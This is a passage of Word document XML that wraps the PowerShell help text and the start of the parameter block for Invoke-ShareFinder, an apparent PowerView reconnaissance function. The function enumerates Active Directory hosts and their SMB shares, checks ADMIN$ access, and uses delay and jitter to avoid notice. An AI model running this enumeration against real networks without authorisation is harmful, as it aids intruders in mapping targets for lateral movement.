        <w:t xml:space="preserve">    .PARAMETER ComputerName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CF9A26" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="355950B0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Host array to enumerate, passable on the pipeline.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E794236" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4CEDD607" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ComputerFile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B389E29" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="26188002" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        File of hostnames/IPs to search.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F3A2E6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="61BD00AF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ComputerFilter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD01D15" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0CF86A80" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Host filter name to query AD for, wildcards accepted.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="311A68FF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5D3AD6D3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ComputerADSpath</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="355054D7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="65D37D11" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        The LDAP source to search through for hosts, e.g. "LDAP://OU=secret,DC=testlab,DC=local"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D71E185" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Useful for OU queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E59E2F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="47F23615" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ExcludeStandard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3211A8A2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6A7F22FE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. Exclude standard shares from display (C$, IPC$, print$ etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6E69CE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="68DDBD27" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ExcludePrint</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DAE7FA6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4A63CE28" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. Exclude the print$ share.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E8BFFA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0919C5CC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ExcludeIPC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CC5CCD8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0B505AFB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. Exclude the IPC$ share.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BF00DD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4E90E22B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER CheckShareAccess</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27417B31" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="161FCC0A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. Only display found shares that the local user has access to.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE348D0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="166D41B6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER CheckAdmin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787E970A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2B75561E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. Only display ADMIN$ shares the local user has access to.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F757D90" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="695ECDC9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER NoPing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75097501" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="06DA912A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. Don't ping each host to ensure it's up before enumerating.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09FFBE05" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="33297D6A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Delay</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59BD1CCE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4706E7BF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        Delay between enumerating hosts, defaults to 0.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF56D37" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="586BC739" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Jitter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C6B371" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="16DED8CF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Jitter for the host delay, defaults to +/- 0.3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E30401B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1C1853E2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C56B32E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5524E0BF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Domain to query for machines, defaults to the current domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CEF51A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="589DA7A2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER DomainController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3334CCBE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0B9F6C2B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Domain controller to reflect LDAP queries through.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E056A9C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="30D7DD55" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER SearchForest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6452C6B1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="569D52B6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Switch. Search all domains in the forest for target users instead of just</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C7AE4DC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        a single domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41AAB678" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4D26FED2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Threads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0AA756" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6FC28168" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The maximum concurrent threads to execute.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13EB53AB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="45F5755A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A3DA4E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4CFACFA8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Invoke-ShareFinder -ExcludeStandard</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFD3A78" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="29B8F0A7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Find non-standard shares on the domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F4EF17" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6D851693" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C001B6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="520E63C8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Invoke-ShareFinder -Threads 20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D16C022" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3CD58EFA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Multi-threaded share finding, replaces Invoke-ShareFinderThreaded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67DAD041" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="507439BC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D7BF43" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="10D11847" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Invoke-ShareFinder -Delay 60</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409D1257" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="64D5766F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Find shares on the domain with a 60 second (+/- *.3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2D7090" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        randomized delay between touching each host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26444843" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2495073C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04435AEC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2703C636" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Invoke-ShareFinder -ComputerFile hosts.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D7BB1D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2D323BE6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Find shares for machines in the specified hosts file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B30C3C3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="18D30E8C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .LINK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E1CA54" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    http://blog.harmj0y.net</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381BDE92" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203649CD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5DBA113E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    [CmdletBinding()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46345436" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    param(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608F698A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(Position=0,ValueFromPipeline=$True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78D0CFBC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Alias('Hosts')]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBE621E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String[]]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BC71ECC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ComputerName,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70F5425C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0BFFC3DA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateScript({Test-Path -Path $_ })]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E09428E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Alias('HostList')]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="744B42E9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0652D245" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ComputerFile,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32594AA7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2691BB3E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC8F371" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ComputerFilter,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B301F8D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="20373479" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00E4CE0B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ComputerADSpath,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C1256E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="60C5D7F5" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20FAC5FF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ExcludeStandard,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8A8201" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0FAA4D50" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1364AD96" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ExcludePrint,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18641DD3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="53D8E252" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426F463F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ExcludeIPC,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E6AC4A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="496C5EB6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D7A3F10" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $NoPing,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D22593" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="59F84D4B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25BA2EBC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $CheckShareAccess,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729F98C4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6FB4996D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6EDF1C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $CheckAdmin,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E722064" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7B5199D4" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [UInt32]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048763D0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Delay = 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590CD789" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5CB58CB7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Double]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE4428A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Jitter = .3,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED97DDA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="38BDE63E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6836AE64" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Domain,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14CD1250" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1A4454B1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A71C4AB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $DomainController,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0992C112" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E05870F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Switch]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151B3B25" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $SearchForest,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50B8B51C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5908D5A0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [ValidateRange(1,100)] </w:t>
      </w:r>
    </w:p>
